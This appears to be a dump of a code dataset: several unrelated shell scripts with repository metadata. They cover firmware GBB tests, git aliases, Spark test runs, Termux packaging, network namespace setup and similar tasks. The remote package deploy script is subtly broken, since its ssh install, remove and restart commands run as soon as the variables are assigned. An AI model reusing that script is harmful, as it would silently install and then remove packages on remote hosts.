"${REPLACE}" 0x14 0x00 < "${TMP}.blob" > "${TMP}.blob.ok"
"${FUTILITY}" gbb "${TMP}.blob.ok"
# And HWID of length 1 consisting only of '\0' is okay, too.
"${REPLACE}" 0x14 0x01 < "${TMP}.blob" | "${REPLACE}" 0x80 0x00 \
> "${TMP}.blob.ok"
"${FUTILITY}" gbb "${TMP}.blob.ok"
# zero-length HWID not null-terminated is invalid
"${REPLACE}" 0x8f 0x41 < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb "${TMP}.blob.bad"; then false; fi
# hwid_offset < GBB_HEADER_SIZE is invalid
"${REPLACE}" 0x10 0x7f < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb "${TMP}.blob.bad"; then false; fi
"${REPLACE}" 0x10 0x00 < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb "${TMP}.blob.bad"; then false; fi
# rootkey_offset < GBB_HEADER_SIZE is invalid
"${REPLACE}" 0x18 0x7f < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb "${TMP}.blob.bad"; then false; fi
"${REPLACE}" 0x18 0x00 < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb "${TMP}.blob.bad"; then false; fi
# recovery_key_offset < GBB_HEADER_SIZE is invalid
"${REPLACE}" 0x28 0x7f < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb "${TMP}.blob.bad"; then false; fi
"${REPLACE}" 0x28 0x00 < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb "${TMP}.blob.bad"; then false; fi
# hwid: offset + size == end of file is okay; beyond is invalid
"${REPLACE}" 0x14 0x40 < "${TMP}.blob" > "${TMP}.blob.bad"
"${FUTILITY}" gbb -g "${TMP}.blob.bad"
"${REPLACE}" 0x14 0x41 < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb -g "${TMP}.blob.bad"; then false; fi
# rootkey: offset + size == end of file is okay; beyond is invalid
"${REPLACE}" 0x1c 0x30 < "${TMP}.blob" > "${TMP}.blob.bad"
"${FUTILITY}" gbb -g "${TMP}.blob.bad"
"${REPLACE}" 0x1c 0x31 < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb -g "${TMP}.blob.bad"; then false; fi
# recovery_key: offset + size == end of file is okay; beyond is invalid
"${REPLACE}" 0x2c 0x10 < "${TMP}.blob" > "${TMP}.blob.bad"
"${FUTILITY}" gbb -g "${TMP}.blob.bad"
"${REPLACE}" 0x2c 0x11 < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb -g "${TMP}.blob.bad"; then false; fi
# hwid_size == 0 doesn't complain, but can't be set
"${REPLACE}" 0x14 0x00 < "${TMP}.blob" > "${TMP}.blob.bad"
"${FUTILITY}" gbb -g "${TMP}.blob.bad"
if "${FUTILITY}" gbb -s --hwid="A" "${TMP}.blob.bad"; then false; fi
# rootkey_size == 0 gives warning, gets nothing, can't be set
"${REPLACE}" 0x1c 0x00 < "${TMP}.blob" > "${TMP}.blob.bad"
"${FUTILITY}" gbb -g --rootkey "${TMP}.read1" "${TMP}.blob.bad"
if "${FUTILITY}" gbb -s --rootkey "${TMP}.data1" "${TMP}.blob.bad";
then false; fi
# recovery_key_size == 0 gives warning, gets nothing, can't be set
"${REPLACE}" 0x2c 0x00 < "${TMP}.blob" > "${TMP}.blob.bad"
"${FUTILITY}" gbb -g --recoverykey "${TMP}.read2" "${TMP}.blob.bad"
if "${FUTILITY}" gbb -s --recoverykey "${TMP}.data2" "${TMP}.blob.bad";
then false; fi
# GBB v1.2 adds a sha256 digest field in what was previously padding:
#
# hwid_digest: 0x0030 xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx
# 0x0040 xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx
# pad: 0x0050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
# 0x0060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
# 0x0070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
# (HWID) 0x0080 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 00
# See that the digest is updated properly.
hwid="123456789ABCDEF"
"${FUTILITY}" gbb -s --hwid="${hwid}" "${TMP}.blob"
expect=$(echo -n "$hwid" | sha256sum | cut -d ' ' -f 1)
[ "$(echo -n "${expect}" | wc -c)" == "64" ]
"${FUTILITY}" gbb -g --digest "${TMP}.blob" | grep "${expect}"
# Garble the digest, see that it's noticed.
# (assuming these zeros aren't present)
"${REPLACE}" 0x33 0x00 0x00 0x00 0x00 0x00 < "${TMP}.blob" > "${TMP}.blob.bad"
"${FUTILITY}" gbb -g --digest "${TMP}.blob.bad" | grep '0000000000'
"${FUTILITY}" gbb -g --digest "${TMP}.blob.bad" | grep 'invalid'
# Garble the HWID. The digest is unchanged, but now invalid.
"${REPLACE}" 0x84 0x70 0x71 0x72 < "${TMP}.blob" > "${TMP}.blob.bad"
"${FUTILITY}" gbb -g --digest "${TMP}.blob.bad" | grep 'invalid'
# cleanup
rm -f "${TMP}"*
exit 0
| true
|
af502111d9a5e16ff184e1c73cb6ddede69a45e1
|
Shell
|
ritcheyer/dotfiles
|
/git/aliases.zsh
|
UTF-8
| 1,185
| 2.984375
| 3
|
[
"MIT"
] |
permissive
|
# Use `hub` as our git wrapper:
# http://defunkt.github.com/hub/
hub_path=$(which hub)
if (( $+commands[hub] ))
then
alias git=$hub_path
fi
# The rest of my fun git aliases
alias glog="git log --graph --pretty=format:'%Cred%h%Creset %an: %s - %Creset %C(yellow)%d%Creset %Cgreen(%cr)%Creset' --abbrev-commit --date=relative"
alias gp='git push origin HEAD'
# Remove `+` and `-` from start of diff lines; just rely upon color.
alias gd='git diff --color | sed "s/^\([^-+ ]*\)[-+ ]/\\1/" | less -r'
alias g='git'
alias ga='git add'
alias gb='git branch'
alias gc='git commit'
alias gca='git commit -a'
alias gch='git checkout'
alias gcb='git checkout -b'
alias gco='git checkout'
alias gd='git diff | $EDITOR'
alias gl='git log'
alias gs='git status -sb'
alias push='git push'
alias pull='git pull'
alias merge='git merge'
alias such=git
alias very=git
alias wow='git status'
# Running the daily git commands
alias dailytask="gco master && pull && git fetch --prune"
alias deletelocal="git branch --merged | egrep -v \"(^\*|main|master|dev)\" | xargs git branch -d"
alias deleteremote="git push --delete origin"
alias gac='git add -A && git commit -m'
alias ge='git-edit-new'
| true
|
eedc121a7323fd808c27e4447b5fe769275f815b
|
Shell
|
julp/ugrep
|
/test/utr.sh
|
UTF-8
| 3,359
| 4.0625
| 4
|
[] |
no_license
|
#!/bin/bash
# charset: UTF-8
declare -r TESTDIR=$(dirname $(readlink -f "${BASH_SOURCE}"))
declare -r DATADIR="${TESTDIR}/data"
# Words of the form $'string' are treated specially. The word expands to string, with backslash-escaped characters
# replaced as specified by the ANSI C standard. Backslash escape sequences, if present, are decoded as follows:
# \a alert (bell)
# \b backspace
# \e
# \E an escape character
# \f form feed
# \n new line
# \r carriage return
# \t horizontal tab
# \v vertical tab
# \\ backslash
# \' single quote
# \" double quote
# \nnn the eight-bit character whose value is the octal value nnn (one to three digits)
# \xHH the eight-bit character whose value is the hexadecimal value HH (one or two hex digits)
# \cx a control-x character
#
# The expanded result is single-quoted, as if the dollar sign had not been present.
#
# A double-quoted string preceded by a dollar sign ($"string") will cause the string to be translated according to the cur‐
# rent locale. If the current locale is C or POSIX, the dollar sign is ignored. If the string is translated and replaced,
# the replacement is double-quoted.
. ${TESTDIR}/assert.sh.inc
declare -r INPUT="a${A}b${B}c${C}d${D}e${E}"
# Full case not "supported"
# declare -r LSFI=$'\xEF\xAC\x81' # FB01, Ll
# declare -r FI=$'\x66\x69' # F + I
assertOutputValue "tr 1 CU => 0" "./utr ${UGREP_OPTS} -d [abcde] ${INPUT} 2> /dev/null" "${A}${B}${C}${D}${E}"
assertOutputValue "tr 2 CU => 0" "./utr ${UGREP_OPTS} -d [${A}${B}${C}${D}${E}] ${INPUT} 2> /dev/null" "abcde"
assertOutputValue "tr 1 CU => 1" "./utr ${UGREP_OPTS} abcde 12345 ${INPUT} 2> /dev/null" "1${A}2${B}3${C}4${D}5${E}"
assertOutputValue "tr 2 CU => 1" "./utr ${UGREP_OPTS} ${A}${B}${C}${D}${E} 12345 ${INPUT} 2> /dev/null" "a1b2c3d4e5"
assertOutputValue "tr 1 CU => 2" "./utr ${UGREP_OPTS} abcde ${N1}${N2}${N3}${N4}${N5} ${INPUT} 2> /dev/null" "${N1}${A}${N2}${B}${N3}${C}${N4}${D}${N5}${E}"
assertOutputValue "tr 2 CU => 2" "./utr ${UGREP_OPTS} ${A}${B}${C}${D}${E} ${N1}${N2}${N3}${N4}${N5} ${INPUT} 2> /dev/null" "a${N1}b${N2}c${N3}d${N4}e${N5}"
assertOutputValue "tr eliminate by function" "./utr ${UGREP_OPTS} -d fn:isalpha ${A}${N1}${B}${N2}${C}${N3} 2> /dev/null" "${N1}${N2}${N3}"
assertOutputValue "tr eliminate by set" "./utr ${UGREP_OPTS} -d \"[\p{Lu}]\" ${A}${N1}${B}${N2}${C}${N3} 2> /dev/null" "${N1}${N2}${N3}"
assertOutputValue "tr function lower => upper (1/2 => 2 CU)" "./utr ${UGREP_OPTS} fn:islower fn:toupper ${N1}${DSLLI}${N2} 2> /dev/null" "${N1}${DCLLI}${N2}"
assertOutputValue "tr replace by one (2 CU)" "./utr ${UGREP_OPTS} ${N1}${C}${A}a${B} ${DCLLI} ${INPUT} 2> /dev/null" "${DCLLI}${DCLLI}b${DCLLI}c${DCLLI}d${D}e${E}"
assertOutputValue "tr grapheme deletion" "./utr ${UGREP_OPTS} --unit=grapheme --form=d -d ${E_ACUTE_NFD} ${E_ACUTE_NFD}${A_ACUTE_NFD} 2> /dev/null" "${A_ACUTE_NFD}"
assertOutputValue "tr grapheme replacement" "./utr ${UGREP_OPTS} --unit=grapheme --form=d ${E_ACUTE_NFD} X ${E_ACUTE_NFD}${A_ACUTE_NFD} 2> /dev/null" "X${A_ACUTE_NFD}"
exit $?
| true
|
f2fdeb5de49be7aa3c8d680292d3c6207199e3c1
|
Shell
|
cloudfoundry/metric-store-ci
|
/tasks/enable-disable-alert-failure/run.sh
|
UTF-8
| 747
| 3.328125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
. ./metric-store-ci/tasks/shared_bash
set -eoux pipefail
current_version=$(cat slack-rate-limit-version/version)
patch_version=$(patch_from_semver ${current_version})
alert_multiple=${alert_multiple:-5}
ignore_first=${ignore_first:-false}
if [[ ${patch_version} -gt 1 && $(( ${patch_version} % ${alert_multiple} )) -ne 0 ]]; then
echo "Not the first failure or a multiple of ${alert_multiple}, disable alert (failure #${patch_version})"
alert_disable
elif [[ ${patch_version} -eq 1 ]] && $ignore_first; then
echo "Ignore first failure, disable alert (failure #${patch_version})"
alert_disable
else
echo "First failure or a multiple of ${alert_multiple}, enable alert (failure #${patch_version})"
alert_enable
fi
| true
|
b6370cdaf93c3bcd5bad2a58c8e1bbf4a1f4c6cd
|
Shell
|
Nectolink/BashScript
|
/arry.sh
|
UTF-8
| 218
| 3.75
| 4
|
[] |
no_license
|
#!/bin/bash
func()
{
#Filling Arry with loop
echo Lenth of Arry:-
read en
for((i=0; i<=$en; i++))
do
read a
arry[$i]=$a
done
}
func
#Arry In List Foreach
echo arry in list:-
for var in ${arry[*]}
do
echo $var
done
| true
|
32aede4576d0a59753b9aee1829013e4798ffcd9
|
Shell
|
ShubhamChaurasia/spark-rapids
|
/integration_tests/run_pyspark_from_build.sh
|
UTF-8
| 7,439
| 3.140625
| 3
|
[
"Apache-2.0",
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
# Copyright (c) 2020-2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -ex
SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )"
cd "$SCRIPTPATH"
if [[ $( echo ${SKIP_TESTS} | tr [:upper:] [:lower:] ) == "true" ]];
then
echo "PYTHON INTEGRATION TESTS SKIPPED..."
elif [[ -z "$SPARK_HOME" ]];
then
>&2 echo "SPARK_HOME IS NOT SET CANNOT RUN PYTHON INTEGRATION TESTS..."
else
echo "WILL RUN TESTS WITH SPARK_HOME: ${SPARK_HOME}"
# support alternate local jars NOT building from the source code
if [ -d "$LOCAL_JAR_PATH" ]; then
CUDF_JARS=$(echo "$LOCAL_JAR_PATH"/cudf-*.jar)
PLUGIN_JARS=$(echo "$LOCAL_JAR_PATH"/rapids-4-spark_*.jar)
TEST_JARS=$(echo "$LOCAL_JAR_PATH"/rapids-4-spark-integration-tests*.jar)
UDF_EXAMPLE_JARS=$(echo "$LOCAL_JAR_PATH"/rapids-4-spark-udf-examples*.jar)
else
CUDF_JARS=$(echo "$SCRIPTPATH"/target/dependency/cudf-*.jar)
PLUGIN_JARS=$(echo "$SCRIPTPATH"/../dist/target/rapids-4-spark_*.jar)
TEST_JARS=$(echo "$SCRIPTPATH"/target/rapids-4-spark-integration-tests*.jar)
UDF_EXAMPLE_JARS=$(echo "$SCRIPTPATH"/../udf-examples/target/rapids-4-spark-udf-examples*.jar)
fi
ALL_JARS="$CUDF_JARS $PLUGIN_JARS $TEST_JARS $UDF_EXAMPLE_JARS"
echo "AND PLUGIN JARS: $ALL_JARS"
if [[ "${TEST}" != "" ]];
then
TEST_ARGS="-k $TEST"
fi
if [[ "${TEST_TAGS}" != "" ]];
then
TEST_TAGS="-m $TEST_TAGS"
fi
if [[ "${TEST_PARALLEL}" == "" ]];
then
# For now just assume that we are going to use the GPU on the
# system with the most free memory and then divide it up into chunks.
# We use free memory to try and avoid issues if the GPU also is working
# on graphics, which happens some times.
# We subtract one for the main controlling process that will still
# launch an application. It will not run thing on the GPU but it needs
# to still launch a spark application.
TEST_PARALLEL=`nvidia-smi --query-gpu=memory.free --format=csv,noheader | awk '{if (MAX < $1){ MAX = $1}} END {print int(MAX / (2.3 * 1024)) - 1}'`
echo "AUTO DETECTED PARALLELISM OF $TEST_PARALLEL"
fi
if python -c 'import findspark';
then
echo "FOUND findspark"
else
TEST_PARALLEL=0
echo "findspark not installed cannot run tests in parallel"
fi
if python -c 'import xdist.plugin';
then
echo "FOUND xdist"
else
TEST_PARALLEL=0
echo "xdist not installed cannot run tests in parallel"
fi
TEST_TYPE_PARAM=""
if [[ "${TEST_TYPE}" != "" ]];
then
TEST_TYPE_PARAM="--test_type $TEST_TYPE"
fi
if [[ ${TEST_PARALLEL} -lt 2 ]];
then
# With xdist 0 and 1 are the same parallelsm but
# 0 is more effecient
TEST_PARALLEL_OPTS=()
MEMORY_FRACTION='1'
else
MEMORY_FRACTION=`python -c "print(1/($TEST_PARALLEL + 1))"`
TEST_PARALLEL_OPTS=("-n" "$TEST_PARALLEL")
fi
RUN_DIR=${RUN_DIR-"$SCRIPTPATH"/target/run_dir}
mkdir -p "$RUN_DIR"
cd "$RUN_DIR"
## Under cloud environment, overwrite the '--rootdir' param to point to the working directory of each excutor
LOCAL_ROOTDIR=${LOCAL_ROOTDIR:-"$SCRIPTPATH"}
## Under cloud environment, overwrite the '--std_input_path' param to point to the distributed file path
INPUT_PATH=${INPUT_PATH:-"$SCRIPTPATH"}
RUN_TESTS_COMMAND=("$SCRIPTPATH"/runtests.py
--rootdir
"$LOCAL_ROOTDIR"
"$LOCAL_ROOTDIR"/src/main/python)
TEST_COMMON_OPTS=(-v
-rfExXs
"$TEST_TAGS"
--std_input_path="$INPUT_PATH"/src/test/resources
--color=yes
$TEST_TYPE_PARAM
"$TEST_ARGS"
$RUN_TEST_PARAMS
"$@")
NUM_LOCAL_EXECS=${NUM_LOCAL_EXECS:-0}
MB_PER_EXEC=${MB_PER_EXEC:-1024}
CORES_PER_EXEC=${CORES_PER_EXEC:-1}
# Spark 3.1.1 includes https://github.com/apache/spark/pull/31540
# which helps with spurious task failures as observed in our tests. If you are running
# Spark versions before 3.1.1, this sets the spark.max.taskFailures to 4 to allow for
# more lineant configuration, else it will set them to 1 as spurious task failures are not expected
# for Spark 3.1.1+
VERSION_STRING=`$SPARK_HOME/bin/pyspark --version 2>&1|grep -v Scala|awk '/version\ [0-9.]+/{print $NF}'`
[[ -z $VERSION_STRING ]] && { echo "Unable to detect the Spark version at $SPARK_HOME"; exit 1; }
echo "Detected Spark version $VERSION_STRING"
SPARK_TASK_MAXFAILURES=1
[[ "$VERSION_STRING" < "3.1.1" ]] && SPARK_TASK_MAXFAILURES=4
export PYSP_TEST_spark_driver_extraClassPath="${ALL_JARS// /:}"
export PYSP_TEST_spark_executor_extraClassPath="${ALL_JARS// /:}"
export PYSP_TEST_spark_driver_extraJavaOptions="-ea -Duser.timezone=UTC $COVERAGE_SUBMIT_FLAGS"
export PYSP_TEST_spark_executor_extraJavaOptions='-ea -Duser.timezone=UTC'
export PYSP_TEST_spark_ui_showConsoleProgress='false'
export PYSP_TEST_spark_sql_session_timeZone='UTC'
export PYSP_TEST_spark_sql_shuffle_partitions='12'
# prevent cluster shape to change
export PYSP_TEST_spark_dynamicAllocation_enabled='false'
# Set spark.task.maxFailures for most schedulers.
#
# Local (non-cluster) mode is the exception and does not work with `spark.task.maxFailures`.
# It requires two arguments to the master specification "local[N, K]" where
# N is the number of threads, and K is the maxFailures (otherwise this is hardcoded to 1,
# see https://issues.apache.org/jira/browse/SPARK-2083).
export PYSP_TEST_spark_task_maxFailures="$SPARK_TASK_MAXFAILURES"
if ((NUM_LOCAL_EXECS > 0)); then
export PYSP_TEST_spark_master="local-cluster[$NUM_LOCAL_EXECS,$CORES_PER_EXEC,$MB_PER_EXEC]"
else
# If a master is not specified, use "local[*, $SPARK_TASK_MAXFAILURES]"
if [ -z "${PYSP_TEST_spark_master}" ] && [[ "$SPARK_SUBMIT_FLAGS" != *"--master"* ]]; then
export PYSP_TEST_spark_master="local[*,$SPARK_TASK_MAXFAILURES]"
fi
fi
if ((${#TEST_PARALLEL_OPTS[@]} > 0));
then
export PYSP_TEST_spark_rapids_memory_gpu_allocFraction=$MEMORY_FRACTION
export PYSP_TEST_spark_rapids_memory_gpu_maxAllocFraction=$MEMORY_FRACTION
# when running tests in parallel, we allocate less than the default minAllocFraction per test
# so we need to override this setting here
export PYSP_TEST_spark_rapids_memory_gpu_minAllocFraction=0
python "${RUN_TESTS_COMMAND[@]}" "${TEST_PARALLEL_OPTS[@]}" "${TEST_COMMON_OPTS[@]}"
else
"$SPARK_HOME"/bin/spark-submit --jars "${ALL_JARS// /,}" \
--driver-java-options "$PYSP_TEST_spark_driver_extraJavaOptions" \
$SPARK_SUBMIT_FLAGS "${RUN_TESTS_COMMAND[@]}" "${TEST_COMMON_OPTS[@]}"
fi
fi
| true
|
72fdc5e58ccc9270513eb94ba7c0c8d8d2caa30c
|
Shell
|
fvegaucr/slack
|
/fer_theconstructor/bin/remote_pack_deploy.sh
|
UTF-8
| 2,910
| 3.84375
| 4
|
[] |
no_license
|
#!/bin/bash
PACKAGE=$1
ACTION=$2
NOTIFY=$3
HOST=$4
CHECK_INSTALL='`ssh $HOST "whereis $PACKAGE | cut -d : -f2"`'
INSTALL=`ssh '$HOST' "sudo apt-get install $PACKAGE -y"`
REMOVE=`ssh $HOST "sudo apt-get remove $PACKAGE -y"`
REMINSTLOG="../var/remote_installer_sh.log"
FILE_APP="../files/index.php"
RESTART=`ssh $HOST "service $PACKAGE restart"`
if [ "$ACTION" == "install" ] ; then
echo "Starting Installation"
echo ' '`date -u`' -- "install" Option selected' >> $REMINSTLOG
if [ "$CHECK_INSTALL" == "" ]; then
if [ "$PACKAGE" == "apache2" ]; then
echo "Package $PACKAGE is not installed $HOST"
echo ''`date -u`' -- Package '$PACKAGE' is not installed '$HOST''
echo "Installing $PACKAGE in $HOST"
echo ''`date -u`' -- Installing '$PACKAGE' in '$HOST''
echo "========================================="
echo "$INSTALL"
`ssh $HOST "apt-get install -y libapache2-mod-php"`
echo "$PACKAGE has being installed in $HOST"
echo "Installing app"
`scp $FILE_APP $HOST:/var/www/html/`
`ls -la /var/www/html/`
sleep 2
echo "$RESTART"
else
echo "Package $PACKAGE is not installed $HOST"
echo ''`date -u`' -- Package '$PACKAGE' is not installed '$HOST''
echo "Installing $PACKAGE in $HOST"
echo ''`date -u`' -- Installing '$PACKAGE' in '$HOST''
echo "========================================="
echo "$INSTALL"
echo "$PACKAGE has being installed in $HOST"
fi
else
echo "Package $PACKAGE already install in $HOST"
REMOTEFILE=`ssh $HOST "ls /var/www/html | grep index.html"`
if [ "$REMOTEFILE" == "index.html" ] ; then
`scp $FILE_APP $HOST:/var/www/html/`
`ssh $HOST "rm -rf /var/www/html/index.html"`
echo "$RESTART"
fi
echo ''`date -u`' -- Package '$PACKAGE' already install in '$HOST''
exit 0
fi
elif [ "$ACTION" == "remove" ]; then
echo ' '`date -u`' -- "remove" Option selected' >> $REMINSTLOG
if [ "$CHECK_INSTALL" != "" ]; then
if [ "$PACKAGE" == "apache2" ] ; then
echo "Removing package $PACKAGE from $HOST"
echo ''`date -u`' -- Removing '$PACKAGE' from '$HOST''
echo "========================================="
echo $REMOVE
`ssh $HOST "rm -rf /var/www/html/*"`
echo $RESTART
echo "$PACKAGE removed from $HOST"
else
echo "Removing package $PACKAGE from $HOST"
echo ''`date -u`' -- Removing '$PACKAGE' from '$HOST''
echo "========================================="
echo $REMOVE
echo "$PACKAGE removed from $HOST"
fi
else
echo "Package $PACKAGE alredy uninstalled in $HOST"
echo ''`date -u`' -- Package '$PACKAGE' already uninstalled in '$HOST''
exit 0
fi
else
echo ' '`date -u`' -- "action" Option not Selected' >> $REMINSTLOG
echo '"action" Option not Selected'
echo 'Available Options "install/remove"'
exit 1
fi
| true
|
ebe463362caf30a7598a765a512d803c4f846203
|
Shell
|
timerzpro/termux-packages
|
/packages/git-crypt/build.sh
|
UTF-8
| 739
| 2.625
| 3
|
[
"Apache-2.0"
] |
permissive
|
TERMUX_PKG_HOMEPAGE=https://www.agwa.name/projects/git-crypt/
TERMUX_PKG_DESCRIPTION="git-crypt enables transparent encryption and decryption of files in a git repository."
TERMUX_PKG_LICENSE="GPL-3.0"
TERMUX_PKG_VERSION=0.6.0
TERMUX_PKG_MAINTAINER="@jottr"
TERMUX_PKG_SHA256=777c0c7aadbbc758b69aff1339ca61697011ef7b92f1d1ee9518a8ee7702bb78
TERMUX_PKG_SRCURL="https://github.com/AGWA/git-crypt/archive/${TERMUX_PKG_VERSION}.tar.gz"
TERMUX_PKG_EXTRA_CONFIGURE_ARGS=" -DCMAKE_BUILD_TYPE=Release -Dbuild_parse=yes -Dbuild_xmlparser=yes"
TERMUX_PKG_EXTRA_MAKE_ARGS="make ENABLE_MAN=yes"
TERMUX_PKG_DEPENDS="git, openssl"
termux_step_make() {
cd $TERMUX_PKG_SRCDIR
make
}
termux_step_make_install() {
cd $TERMUX_PKG_SRCDIR
make install
}
| true
|
72cfad1fabcdd0fce2176aa9f7bc5f13d9047b3a
|
Shell
|
nlamirault/kzenv
|
/libexec/kzenv-version-name
|
UTF-8
| 1,169
| 4
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Summary: Show the current Kustomize version
set -e
[ -n "${KZENV_DEBUG}" ] && set -x
source "${KZENV_ROOT}/libexec/helpers"
[ -d "${KZENV_ROOT}/versions" ] \
|| error_and_die "No versions of kustomize installed. Please install one with: kzenv install"
KZENV_VERSION_FILE="$(kzenv-version-file)"
KZENV_VERSION="$(cat "${KZENV_VERSION_FILE}" || true)"
if [[ "${KZENV_VERSION}" =~ ^latest.*$ ]]; then
[[ "${KZENV_VERSION}" =~ ^latest\:.*$ ]] && regex="${KZENV_VERSION##*\:}"
version="$(\ls "${KZENV_ROOT}/versions" \
| sort -t'.' -k 1nr,1 -k 2nr,2 -k 3nr,3 \
| grep -e "${regex}" \
| head -n 1
)"
[ -n "${version}" ] || error_and_die "No installed versions of kustomize matched '${KZENV_VERSION}'"
KZENV_VERSION="${version}"
fi
[ -z "${KZENV_VERSION}" ] \
&& error_and_die "Version could not be resolved (set by ${KZENV_VERSION_FILE} or kzenv use <version>)"
version_exists() {
local version="${1}"
[ -d "${KZENV_ROOT}/versions/${version}" ]
}
if version_exists "${KZENV_VERSION}"; then
echo "${KZENV_VERSION}"
else
error_and_die "version '${KZENV_VERSION}' is not installed (set by ${KZENV_VERSION_FILE})"
fi
| true
|
7c35076ea35268ac1e62652e6466016dadab434a
|
Shell
|
jqrsound/EYESY_OS_for_RasPiSound
|
/pisound-ctl/eyesy_launch.sh
|
UTF-8
| 692
| 3.109375
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/sh
# Copyright (C) 2017-2018 Vilniaus Blokas UAB, https://blokas.io/pisound
# All rights reserved.
#
# This software may be modified and distributed under the terms
# of the BSD license. See the LICENSE file for details.
#
systemctl start eyesy-python.service
systemctl start eyesy-web.service
systemctl start eyesy-web-socket.service
. /usr/local/pisound/scripts/common/start_puredata_eyesy.sh
PATCH="$1"
shift
echo
echo "$PATCH"
echo "$@"
(
# Connect the osc2midi bridge to the MIDI Inputs and to Pure Data.
sleep 4
/usr/local/pisound-ctl/connect_osc2midi.sh "pisound-ctl"
aconnect "pisound-ctl" "Pure Data";
aconnect -d "Pure Data:1" "pisound-ctl"
) &
start_puredata "$PATCH" $@ß
| true
|
33f263a4e815a8130b22a928886c4c49b57a794e
|
Shell
|
linktoakilan/wildflyapp
|
/entrypoint.sh
|
UTF-8
| 703
| 3.03125
| 3
|
[] |
no_license
|
#!/bin/bash
set -u # Fail on unset variables
set -e # Fail if any command fails
#get container IP from the container metadata
CONTAINER_IP=$(curl -s http://169.254.170.2/v2/metadata | jq -r .Containers[0].Networks[0].IPv4Addresses[0])
PORT_OFFSET=0
echo "Using Container IP: ${CONTAINER_IP}"
echo "Using Port Offset: ${PORT_OFFSET} "
#Bind Wildfly interfaces to the container IP. The port offset allows Wildfly interfaces to be started on different ports.
exec /opt/jboss/wildfly/bin/standalone.sh -c standalone-ha.xml -b ${CONTAINER_IP} -bmanagement ${CONTAINER_IP} -Djboss.node.name=node-${CONTAINER_IP} -Djboss.bind.address.private=${CONTAINER_IP} -Djboss.socket.binding.port-offset=${PORT_OFFSET}
| true
|
90fb712b06c98329b5c182e92a46087522cd5bc4
|
Shell
|
cirocosta/llb
|
/utils/setup-routing.sh
|
UTF-8
| 994
| 3.515625
| 4
|
[] |
no_license
|
#!/bin/bash
set -o errexit
set -o xtrace
main() {
case $1 in
setup)
setup
;;
clean)
clean
;;
*)
echo "Usage: ./setup-routing.sh (setup|clean)"
exit 1
;;
esac
}
clean() {
ip -all netns delete
ip link delete br1 || true
}
setup() {
ip netns add namespace1
ip netns add namespace2
ip link add veth1 type veth peer name br-veth1
ip link add veth2 type veth peer name br-veth2
ip link set veth1 netns namespace1
ip link set veth2 netns namespace2
ip netns exec namespace1 \
ip addr add 192.168.1.11/24 dev veth1
ip netns exec namespace2 \
ip addr add 192.168.1.12/24 dev veth2
ip link add name br1 type bridge
ip link set br1 up
ip link set br-veth1 up
ip link set br-veth2 up
ip netns exec namespace1 \
ip link set veth1 up
ip netns exec namespace2 \
ip link set veth2 up
ip link set br-veth1 master br1
ip link set br-veth2 master br1
ip addr add 192.168.1.10/24 brd + dev br1
}
main "$@"
| true
|
37734a3e96ae097872efb4d40f4d158f22f35be2
|
Shell
|
socal-ucr/djinn
|
/tonic-suite/img/scripts/ALL.sh
|
UTF-8
| 350
| 3.046875
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/usr/bin/env bash
declare -a RTT
for DIR in {1..12}
do
mv ${DIR}_run 4_sem_results/
for FILE in {25..64..1}
do
tail -n 900 ${FILE}.out >> temp
OUTPUT="$(../${1}.py -i temp)"
rm temp
RTT[${FILE}]="${RTT[${FILE}]},${OUTPUT}"
done
cd ../
done
for i in {25..64}
do
echo "${RTT[${i}]}"
done
| true
|
3139009c235a675b2e381c84492ee4c905913a44
|
Shell
|
ulic75/unraid_vm_icons
|
/icon_download.sh
|
UTF-8
| 5,316
| 3.734375
| 4
|
[] |
no_license
|
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # Download custom vm icons from github and add them to Unraid server # #
# # by - SpaceinvaderOne # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # Variables - (other variables set in container template # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Directory for downloaded icons to be stored
DIR="/config/icons"
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # Functions # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Delete icon store if present and delete if set to yes in template
shall_i_delete() {
#check if icon store exists and delete it if clear icons flag is set
if [ -d $DIR ] && [ $delete == "yes" ]; then
rm -r $DIR
echo "I have deleted all vm icons ready to download fresh icons to sync"
echo "."
echo "."
else
#do nothing and continue of clear icons flag is not set
echo " Clear all icons not set......continuing."
fi
}
checkgit() {
# delete directory if previously run so can do fresh gitclone
if [ -d /config/unraid_vm_icons ] ; then
rm -r /config/unraid_vm_icons
fi
#run gitclone
git -C /config clone https://github.com/SpaceinvaderOne/unraid_vm_icons.git
}
